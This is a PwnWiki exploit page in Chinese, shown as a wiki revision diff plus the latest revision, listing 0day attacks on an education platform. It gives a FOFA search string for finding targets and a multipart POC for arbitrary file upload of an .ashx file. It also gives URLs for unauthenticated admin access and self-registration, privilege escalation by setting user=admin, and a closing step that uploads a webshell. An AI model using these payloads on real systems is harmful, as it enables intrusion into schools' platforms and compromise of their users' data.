Difference between revisions of "智慧教育平台0day"
From PwnWiki
(Created page with "<languages /> ==FOFA== <pre> "/Widget/common/Service/CommonWidgetService.asmx/Categorylist" </pre> 500px <translate> ==任意文件...") |
(Marked this version for translation) |
||
| Line 9: | Line 9: | ||
<translate> | <translate> | ||
| − | ==任意文件上傳漏洞== | + | ==任意文件上傳漏洞== <!--T:1--> |
</translate> | </translate> | ||
| Line 17: | Line 17: | ||
<translate> | <translate> | ||
| + | <!--T:2--> | ||
使用該Payload後返回任意內容即漏洞存在。 | 使用該Payload後返回任意內容即漏洞存在。 | ||
</translate> | </translate> | ||
| Line 38: | Line 39: | ||
<translate> | <translate> | ||
| + | <!--T:3--> | ||
通過構造的POC成功上傳文件。 | 通過構造的POC成功上傳文件。 | ||
</translate> | </translate> | ||
| Line 49: | Line 51: | ||
<translate> | <translate> | ||
| + | <!--T:4--> | ||
直接進入管理員後台,需要登錄的提示綁定賬號,這時候需要註冊一個賬號登錄。 | 直接進入管理員後台,需要登錄的提示綁定賬號,這時候需要註冊一個賬號登錄。 | ||
</translate> | </translate> | ||
<translate> | <translate> | ||
| − | ==任意用戶註冊漏洞== | + | ==任意用戶註冊漏洞== <!--T:5--> |
</translate> | </translate> | ||
| Line 61: | Line 64: | ||
<translate> | <translate> | ||
| − | ==漏洞利用== | + | ==漏洞利用== <!--T:6--> |
</translate> | </translate> | ||
<translate> | <translate> | ||
| + | <!--T:7--> | ||
註冊成功後,登錄到用戶主頁 | 註冊成功後,登錄到用戶主頁 | ||
</translate> | </translate> | ||
| Line 71: | Line 75: | ||
</pre> | </pre> | ||
<translate> | <translate> | ||
| + | <!--T:8--> | ||
修改<code>user=admin</code>,發現界面發生變化,用戶變為管理員 | 修改<code>user=admin</code>,發現界面發生變化,用戶變為管理員 | ||
</translate> | </translate> | ||
| Line 78: | Line 83: | ||
<translate> | <translate> | ||
| + | <!--T:9--> | ||
進入管理員後台頁面 | 進入管理員後台頁面 | ||
</translate> | </translate> | ||
| Line 88: | Line 94: | ||
<translate> | <translate> | ||
| + | <!--T:10--> | ||
CMS圖片上傳沒有過濾,修改fileType並且上傳Webshell即可。 | CMS圖片上傳沒有過濾,修改fileType並且上傳Webshell即可。 | ||
</translate> | </translate> | ||
Latest revision as of 21:53, 27 March 2021
FOFA
"/Widget/common/Service/CommonWidgetService.asmx/Categorylist"
任意文件上傳漏洞
/SmartMobile/micropage/UpLoad/FilesUpLoadHandler.ashx
使用該Payload後返回任意內容即漏洞存在。
POC
Post: ------WebKitFormBoundaryxJBEcLK1xdylqBhP Content-Disposition: form-data;name="fileType" 2222.ashx ------WebKitFormBoundaryxJBEcLK1xdylqBhP Content-Disposition: form-data;name="file"; filename="2222.jpg" Content-Type: image/jpeg 1 ------WebKitFormBoundaryxJBEcLK1xdylqBhP—
通過構造的POC成功上傳文件。
未經授權訪問漏洞
/SmartMobile/MobileIndex.aspx?uname=admin&orgId=0
直接進入管理員後台,需要登錄的提示綁定賬號,這時候需要註冊一個賬號登錄。
任意用戶註冊漏洞
Module/SSO/SJS_Register.aspx
漏洞利用
註冊成功後,登錄到用戶主頁
http://xxx.xxx.xxx/Module/PersonalCenter/Default.aspx?user=test123
修改user=admin,發現界面發生變化,用戶變為管理員
http://xxx.xxx.xxx/Module/PersonalCenter/Default.aspx?user=admin
進入管理員後台頁面
http://xxx.xxx.xxx/SmartMobile/MobileIndex.aspx?uname=admin&orgId=0
Getshell
CMS圖片上傳沒有過濾,修改fileType並且上傳Webshell即可。
